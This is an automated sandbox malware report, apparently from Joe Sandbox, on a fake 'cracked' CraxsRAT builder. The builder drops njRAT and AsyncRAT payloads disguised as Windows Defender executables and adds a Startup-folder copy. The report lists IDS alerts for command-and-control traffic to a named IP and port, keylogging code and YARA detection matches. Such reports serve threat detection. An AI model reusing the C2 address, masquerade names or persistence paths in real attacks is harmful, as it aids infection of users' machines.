Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54061 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54070 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54071 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54070 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54071 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54072 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54063 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54072 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54063 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54052 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54062 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54054 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54073 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54073 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54054 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54061 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54075 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54075 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54075 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54010 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54072 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54077 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54074 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54077 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54074 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54058 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54068 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54071 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54068 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54079 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54079 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54069 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54066 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54066 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54049 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54073 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54078 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54078 -> 45.145.41.178:2222
Source: Malware configuration extractor URLs: 45.145.41.178
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe, type: DROPPED
Source: global traffic TCP traffic: 192.168.2.5:63387 -> 45.145.41.178:2222
Source: Joe Sandbox View ASN Name: NNT-AS41228LT
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.5:53729
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.5:53717
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.5:49704
Source: unknown TCP traffic detected without corresponding DNS query: 45.145.41.178

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Windows Defender Real Time Protection.exe.0.dr, kl.cs .Net Code: VKCodeToUnicode
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, kl.cs .Net Code: VKCodeToUnicode
Source: 0e75fed00639ea9e725255499292dcdd.exe.2.dr, kl.cs .Net Code: VKCodeToUnicode

E-Banking Fraud

Source: Yara match File source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000000.2145187329.0000000000A32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.4633722381.0000000002FF6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Process information set: 01 00 00 00

System Summary

Source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 10.0.Windows Defender Notification.exe.410000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0000000A.00000000.2480522494.0000000000412000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000000.2145187329.0000000000A32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000002.00000000.2145187329.0000000000A32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000002.00000000.2145187329.0000000000A32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\CraxsRAT v7.6 Cracked.exe.log
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Code function: 2_2_05973172 NtQuerySystemInformation, 2_2_05973172
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Code function: 2_2_05973137 NtQuerySystemInformation, 2_2_05973137
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Code function: 2_2_052032D1 2_2_052032D1
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Code function: 10_2_00007FF848F2AAA2 10_2_00007FF848F2AAA2
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Code function: 10_2_00007FF848F216C9 10_2_00007FF848F216C9
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Code function: 10_2_00007FF848F23069 10_2_00007FF848F23069
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Code function: 10_2_00007FF848F29CF6 10_2_00007FF848F29CF6
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Code function: 10_2_00007FF848F22065 10_2_00007FF848F22065
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Code function: 10_2_00007FF848F284CD 10_2_00007FF848F284CD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FF8490030E9 16_2_00007FF8490030E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_00007FF8490130E9 21_2_00007FF8490130E9
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe Code function: 27_2_00007FF848F216C9 27_2_00007FF848F216C9
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe Code function: 27_2_00007FF848F22065 27_2_00007FF848F22065
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe Code function: 27_2_00007FF848F20E78 27_2_00007FF848F20E78
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1864 -s 800
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2493555663.00000000063FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemscorwks.dllT vs CraxsRAT v7.6 Cracked.exe
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2493555663.0000000006469000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWindows Defender Notification.exe4 vs CraxsRAT v7.6 Cracked.exe
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWindows Defender Notification.exe4 vs CraxsRAT v7.6 Cracked.exe
Source: CraxsRAT v7.6 Cracked.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 10.0.Windows Defender Notification.exe.410000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0000000A.00000000.2480522494.0000000000412000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000000.2145187329.0000000000A32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000002.00000000.2145187329.0000000000A32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000002.00000000.2145187329.0000000000A32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
